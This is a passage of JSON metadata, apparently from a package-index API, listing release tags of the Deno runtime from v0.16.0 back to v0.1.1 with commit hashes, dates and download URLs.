//codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1